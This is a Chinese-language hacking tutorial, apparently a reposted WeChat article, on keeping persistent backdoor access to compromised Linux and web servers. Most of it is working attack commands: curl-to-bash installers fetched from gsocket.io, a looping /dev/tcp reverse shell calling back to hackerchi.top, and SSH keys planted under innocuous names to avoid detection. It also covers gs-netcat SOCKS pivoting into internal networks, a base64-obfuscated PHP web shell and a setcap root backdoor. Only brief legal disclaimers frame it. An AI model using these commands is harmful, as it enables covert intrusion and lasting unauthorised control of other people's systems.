高级黑客技术- 6. 后门

admin 2024年5月1日18:40:41评论28 views字数 2163阅读7分12秒阅读模式
高级黑客技术- 6. 后门

欢迎访问我们的网站和关注我们的公众号,获取最新的免费资源、安全知识、信息流。                   

网站https://hackerchi.top                                         

信息流https://hackerchi.top/Feeds.html

公众号:黑客驰

在渗透测试中,建立持久的后门是至关重要的,以便在需要时重新访问系统。以下是一些常用的后门技术

6.1. gs-netcat 自动部署脚本

gs-netcat 工具提供了一个方便的自动部署脚本,可以快速建立反向 shell 连接。

使用方法:

bash -c "$(curl -fsSLk <https://gsocket.io/y>)"

或者

bash -c "$(wget --no-check-certificate -qO- <https://gsocket.io/y>)"

部署您自己的 gsocket 服务器:

LOG=results.log bash -c "$(curl -fsSL <https://gsocket.io/ys>)"  # 注意 '/ys' 而不是 '/y'

6.2. 后台反向 shell

这种后门会在后台持续尝试连接回攻击者的服务器,即使连接断开也会自动重连。

示例:

setsid bash -c 'while :; do bash -i &>/dev/tcp/hackerchi.top/1524 0>&1; sleep 360; done' &>/dev/null

防止多个实例启动:

fuser /dev/shm/.busy &>/dev/null || nohup /bin/bash -c 'while :; do touch /dev/shm/.busy; exec 3</dev/shm/.busy; bash -i &>/dev/tcp/hackerchi.top/1524 0>&1 ; sleep 360; done' &>/dev/null &

6.3. 授权密钥

将攻击者的 SSH 公钥添加到目标系统的 /root/.ssh/authorized_keys 文件中,可以实现持久的后门访问。

提示: 将公钥文件末尾的名称更改为一些不起眼的名称,例如 backup@ubuntu 或管理员的真实姓名,以避免引起怀疑。

示例:

$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCktFkgm40GDkqYwJkNZVb+NLqYoUNSPVPLx0VDbJM0
[...]
u1i+MhhnCQxyBZbrWkFWyzEmmHjZdAZCK05FRXYZRI9yadmvo7QKtRmliqABMU9WGy210PTOLMltbt2C
c3zxLNse/xg0CC16elJpt7IqCFV19AqfHnK4YiXwVJ+M+PyAp/aEAujtHDHp backup@ubuntu

6.4. 远程访问整个网络

使用 gs-netcat 工具可以在目标主机的专用 LAN 上创建一个 SOCKS 出口节点,从而允许攻击者从外部访问内部网络。

示例:

gs-netcat -l -S       # 在目标主机上运行

gs-netcat -p 1080    # 在攻击者工作站上运行

# 从攻击者工作站访问目标主机 LAN 上的 route.local:22
socat - "SOCKS4a:127.1:route.local:22"

其他方法:

  • Gost/Cloudflared: 使用 Cloudflare Tunnel 建立 TCP 隧道。

  • 反向 Wireguard: 使用 Wireguard 建立反向连接,从 segfault.net[1] 访问内部网络。

6.5. 最小的 PHP 后门

将以下代码添加到任何 PHP 文件的开头,即可创建一个简单的后门:

<?php $i=base64_decode("aWYoaXNzZXQoJF9QT1NUWzBdKSl7c3lzdGVtKCRfUE9TVFswXSk7ZGllO30K");eval($i);?>

测试:

### 启动测试 PHP 服务器
cd /var/www/html && php -S 127.0.0.1:8080
### 不执行命令
curl <http://127.0.0.1:8080/test.php>
### 执行命令
curl <http://127.0.0.1:8080/test.php> -d 0="ps fax; uname -mrs; id"

6.6. 本地根后门

一旦获得 root 权限,可以使用以下方法保持 root 状态:

执行以下命令:

setcap cap_setuid+ep /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2

成为 root 用户:

/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'

请注意,后门技术应仅用于合法的渗透测试和安全评估目的。未经授权使用后门是非法的,并可能导致严重后果。

往期精彩内容

Win11安装Kali linux

🧰 Kali Linux 工具脑图:安全专家的军械库

高级黑客技术-5. 反向Shell/Shell

小黑粉培养计划-Kali Linux基础(2)

参考资料

[1]

segfault.net: http://segfault.net/

原文始发于微信公众号(黑客驰):高级黑客技术- 6. 后门

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月1日18:40:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   高级黑客技术- 6. 后门https://cn-sec.com/archives/2703098.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息